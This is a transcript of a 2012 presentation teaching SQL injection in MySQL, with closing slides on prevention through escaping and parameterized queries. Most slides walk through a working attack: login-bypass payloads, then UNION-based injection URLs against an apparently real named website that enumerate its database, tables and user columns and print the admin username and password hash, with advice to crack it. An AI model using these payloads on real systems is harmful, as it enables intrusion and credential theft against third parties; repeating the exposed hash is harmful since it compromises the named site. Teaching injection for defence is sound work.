1 / 30

SQL-injection in action

SQL-injection in action. In MySQL RDBMS By Siamak Aghaeipour Dec 2012. Before Action. Boring part . . . Computer Security. Computer Security is the degree of protection in computer-based equipment. Nothing Is 100% Secure

emery
Download Presentation

SQL-injection in action

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. SQL-injection in action In MySQL RDBMS By SiamakAghaeipour Dec 2012

  2. Before Action Boring part . . .

  3. Computer Security • Computer Security is the degree of protection in computer-based equipment. • Nothing Is 100% Secure There’s an old joke in computer security circles that the only truly secure computer is one that’s disconnected from all power and communication lines, and locked in a safe at the bottom of a reinforced bunker surrounded by armed guards! So … If a hacker wants to enter to your system , you can do nothing but you can make it difficult for him. Remember … Security is a BIG field that is much more than programming.

  4. Hacker Hacker Real hacker is a genius programmer. He is somebody who finds weaknesses in a computer or computer network. Type of Hackers • White Hat - Test security of system. • Black Hat - Destroy data or make the network unusable. • Grey Hat - Combination of a black hat and a white hat (find and try to fix). • Neophyte - Learning before action. • Script Kiddie-Using tools with no understanding. • Hacktivist- Political ideals and issues. • Elite Hacker - Most skilled hackers.

  5. SQL-Injection • What? SQL injection is a technique often used to attack a website. It was one of the top 10 web application vulnerabilities of 2007 and 2010. • How? Injecting SQL statements in a SQL query. • So What? To run an SQL command that can change database content or access the database information. • What’s The Point? The point is DO NOT FORGET “Every user is a hacker”

  6. The Key to prevent SQL-Injection Never and ever trust any kind of user input • Especially that which comes from the client side, even though it comes from a select box, a hidden input field or a cookie. • Check if the given input has the expected data type. NO, IT’S NOT AN OPTION You MUST check validation of every data that comes from user!

  7. Imperva’s Web Application Attack Report Edition #1 - July 2011Imperva is a data security company, which provides solutions for high-value business data protection. RFI : Remote File Inclusion SQLI : SQL-Injection XSS : Cross-Site Scripting

  8. In Action attractive part . . .

  9. SQL-Injection – Login Forms Select: Syntax: • SELECT [column_name(s)] FROM [table_name] WHERE [Condition(s)] Example: SELECT FirstName,LastNameFROM students WHERE FirstName=‘Siamak‘ SELECT 1,2 FROM students WHERE FirstName=‘Siamak‘ SELECT * FROM students WHERE FirstName=‘Siamak‘

  10. SQL-Injection – Login Forms A simple query for validating admin: • SELECT user,passFROM admin WHERE user=‘siamak’ and pass=‘1234’ In a real program siamak and 1234 are variables. So … • SELECT user,passFROM admin WHERE user=‘$usr’ and pass=‘$psw’ What will happen if: $usr = siamak' #; $psw = ;

  11. SQL-Injection – Login Forms A simple query for validating admin: What # does ? # comments the rest of query. So … • SELECT user,passFROM admin WHERE user=‘siamak' # and pass=‘$psw’ And it means: • SELECT user,passFROM admin WHERE user=‘siamak' So you can Login only with the admin username without having password!

  12. SQL-Injection – Login Forms A simple query for validating admin: Or you can $usr = ' OR '1' = '1; $psw = ' OR '1' = '1; • SELECT user,passFROM admin WHERE user=‘' OR '1'='1’and pass=‘' OR '1'='1’ So you can Login with NOTHING!!!

  13. information_schema Most sensitive database in MySQL is information_schema: • This database holds names of all databases, tables, columns,… In SQL-injection attack these tables of information_schema are more useful than others: • SCHEMATA • TABLES • COLUMNS

  14. SQL-Injection – Address bar In a victim site when you click on a link you will redirect to a page something like this: • http://www.example.com/news.php?id=34 So what is ?id=34 ? GET method: Syntax: ?[var1]=[value1]&[var2]=[value2]&[var3]=[value3] Example: ?category=sport&newsID=34 ?name=siamak&orderID=254

  15. SQL-Injection – Address bar When you put 'or "you can find out the query is injectable or not! • http://www.mediamasterminds.com/news/post.php?id=34‘ If the programmer does not filter the value of id warning will occur: • Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/j/s/w/jswilliams1/html/news/post.php on line 12 Now you know that this site is vulnerable. Now, it is time to inject your query to find out more information about the database, tables, … structures.

  16. SQL-Injection – Address bar ORDER BY: Syntax: • SELECT [column_name(s)] FROM [table_name] ORDER BY [column_name || column_number] Example: SELECT FirstName,LastNameFROM students ORDER BY FirstName SELECT FirstName,LastNameFROM students ORDER BY 1 SELECT FirstName,LastNameFROM students ORDER BY 2

  17. SQL-Injection – Address bar • Lets check how many columns are selected in the query. • Use -- to comment rest of the query. • We guess the number of columns. so try to order by the number of columns. • First guess is 100. • Keep doing this until the error disappears. • http://www.mediamasterminds.com/news/post.php?id=42+order+by+100-- error • http://www.mediamasterminds.com/news/post.php?id=42+order+by+50-- error • http://www.mediamasterminds.com/news/post.php?id=42+order+by+20-- OK • http://www.mediamasterminds.com/news/post.php?id=42+order+by+25-- OK • http://www.mediamasterminds.com/news/post.php?id=42+order+by+26-- error Now we have the count of column's that is "25". So this table has 25 columns.

  18. SQL-Injection – Address bar UNION: Syntax: • SELECT [column_name(s)] FROM [table1_name] UNION SELECT [column_name(s)] FROM [table2_name] Example: • SELECT sID,sNameFROM students UNION SELECT tID,tNameFROM teachers • Number of selected columns must be equal in selects. • You can select from another database too.

  19. SQL-Injection – Address bar • Use - to make sure first select wont return any records • Then use union to select from another database [information_schema] • http://www.mediamasterminds.com/news/post.php?id=-42 • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,SCHEMA_NAME,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.SCHEMATA-- • Use LIMIT offset,countto limit the records. EX: LIMIT 2,10 • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,SCHEMA_NAME,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.SCHEMATA+limit+0,1-- • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,SCHEMA_NAME,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.SCHEMATA+limit+1,1-- Now we have the database name: "mediamaster".

  20. SQL-Injection – Address bar GROUP_CONCAT(): Syntax: • SELECT GROUP_CONCAT([column_name(s)]) FROM [table_name] Example: SELECT GROUP_CONCAT(firstName)FROM students • This function returns a string result. EX result if they are three records: “siamak,mazdak,laklak”

  21. SQL-Injection – Address bar • Now we should find the tables name. • This time we select from TABLES from information_schema. • We use GROUP_CONCAT() to make the result an string. • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,GROUP_CONCAT(TABLE_NAME),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.TABLES-- Now we have tables: wp_comments wp_links wp_options wp_postmeta wp_posts wp_term_relationships wp_term_taxonomy wp_terms wp_usermeta wp_users

  22. SQL-Injection – Address bar So we have … • database name: mediamaster • Tables name: wp_comments wp_links wp_options wp_postmeta wp_posts wp_term_relationships wp_term_taxonomy wp_terms wp_usermeta wp_users

  23. SQL-Injection – Address bar • Now we should find the columns name. • The table that holds users is wp_users, so we try to find columns of this table. • This time we select from COLUMNS from information_schema. • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,COLUMN_NAME,TABLE_SCHEMA,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.COLUMNS+limit+200,1-- • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,COLUMN_NAME,TABLE_SCHEMA,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.COLUMNS+limit+300,1-- • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,COLUMN_NAME,TABLE_SCHEMA,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.COLUMNS+limit+262,1-- • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,COLUMN_NAME,TABLE_SCHEMA,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.COLUMNS+limit+341,1-- This table’s columns begin from records number 262 to 341

  24. SQL-Injection – Address bar • columns of wp_usersare: id user_login[341,1] user_pass user_nicename user_email user_url user_registered user_activation_key user_status display_name[350,1] • Now we can find out the exact database in structure. • Then write the main query: • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,user_login,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+wp_users+limit+0,1--

  25. SQL-Injection – Address bar Finally Done. Username : admin HashedPassword: $P$BeV0IWgNwdMuiQ6gCU1o9BjQtI3VsW1 Crack the hash by a password cracker site. THAT’S IT!

  26. After Action Important part . . .

  27. SQL-Injection – Prevent Toprevent SQL-injection, you can escapestringsbeforeputit in thequery. • EX in PHP: (You can also use PDO) $id = intval($id); $user = mysql_real_escape_string($user); • EX in C#.NET: (ParameterizedQuery) SqlParameter[] myparm = new SqlParameter[2]; myparm[0] = new SqlParameter("@User",user); myparm[1] = new SqlParameter("@Pass",password); string comando = "SELECT * FROM table WHERE user=@User AND password=@Pass"; • EX in JAVA: (PreparedStatements) stringselectStatement = "SELECT * FROM User WHERE userId = ? "; preparedStatementprepStmt = con.prepareStatement(selectStatement); prepStmt.setString(1, userId); resultSetrs = prepStmt.executeQuery();

  28. SQL-Injection That was just the beginning. Security This article

  29. SQL-Injection References: Books: 1. Pro PHP Security SECOND EDITION - 2010 - Author: Chris Snyder, Thomas Myer,and Michael Southwell 2. Attack And Defence PHP Web Apps -- Author: ShahriyarJalayeri Articles: 1. SQL Injection - php.net http://php.net/manual/en/security.database.sql-injection.php 2. SQL-Injection Powered by WebSec.ca http://www.websec.ca/kb/sql_injection 3. SQL Injection cheat sheet -- Author: RSnake http://ha.ckers.org/sqlinjection/ 4. Wikipedia http://en.wikipedia.org/ And some other articles …

  30. Thank You All. Any Questions? SiamakAghaeipour http://blacksrc.com

More Related